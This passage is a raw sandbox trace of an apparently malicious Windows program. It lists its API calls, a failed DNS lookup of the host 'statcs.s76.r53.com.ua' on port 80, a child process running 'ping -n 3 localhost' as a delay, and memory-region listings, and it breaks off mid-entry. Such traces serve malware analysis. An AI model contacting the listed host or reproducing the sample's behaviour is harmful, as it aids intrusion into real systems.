GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.509] GetCurrentThreadId () returned 0xe60 [0117.509] GetCurrentThreadId () returned 0xe60 [0117.509] GetCurrentThreadId () returned 0xe60 [0117.509] GetCurrentThreadId () returned 0xe60 [0117.509] GetCurrentThreadId () returned 0xe60 [0117.509] GetCurrentThreadId () returned 0xe60 [0117.509] WSACleanup () returned 0 [0117.692] FreeLibrary (hLibModule=0x77380000) returned 1 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentProcess () returned 0xffffffff [0117.692] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x40, RegionSize=0x11d000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0117.692] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x51d000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x51d000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x3000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] ResetEvent (hEvent=0x88) returned 1 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] ResetEvent (hEvent=0x88) returned 1 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.693] CloseHandle (hObject=0x88) returned 1 [0117.693] CloseHandle (hObject=0x8c) returned 1 [0117.693] CloseHandle (hObject=0x84) returned 1 [0117.693] GetCurrentThreadId () returned 0xe60 [0117.693] GetCurrentThreadId () returned 0xe60 [0117.693] GetCurrentThreadId () returned 0xe60 [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.694] VirtualFree (lpAddress=0x520000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.696] FreeLibrary (hLibModule=0x76910000) returned 1 [0117.696] LocalFree (hMem=0x724448) returned 0x0 [0117.696] FreeLibrary (hLibModule=0x76910000) returned 1 [0117.696] LocalFree (hMem=0x724438) returned 0x0 [0117.696] ExitProcess (uExitCode=0x0) Thread: id = 99 os_tid = 0xe94 [0117.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0117.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x618514, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0117.186] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x651ffc, cbMultiByte=27, lpWideCharStr=0x17ded38, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0117.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0117.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x60a714, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0117.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0117.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x61867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0117.186] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x17dfb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x17dfbac | out: ppResult=0x17dfbac*=0x0) returned 11001 [0117.259] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x17dfb8c*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x17dfbac | out: ppResult=0x17dfbac*=0x0) returned 11001 [0117.355] getnameinfo (in: pSockaddr=0x17dfc14, SockaddrLength=0x0, pNodeBuffer=0x56831c, NodeBufferSize=0x401, pServiceBuffer=0x635124, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="", pServiceBuffer="") returned 10047 [0117.355] htons (hostshort=0x0) returned 0x0 [0117.355] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0117.355] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x407d24, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] SetEvent (hEvent=0x84) returned 1 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] GetCurrentThreadId () returned 0xe94 [0117.355] CloseHandle (hObject=0xb8) returned 1 [0117.355] RtlExitUserThread (Status=0x0) Thread: id = 101 os_tid = 0xeac Process: id = "58" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea16880" os_pid = "0xe70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "54" os_parent_pid = "0xe2c" cmd_line = "ping -n 3 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8522 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8523 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8524 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8525 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 8526 start_va = 0x240000 end_va = 0x247fff entry_point = 0x240000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 8527 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8528 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8529 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8530 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 8531 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8532 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8533 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8534 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8535 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 8536 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 8537 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 8538 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 8539 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8540 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8541 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8542 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8543 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8544 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8545 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point 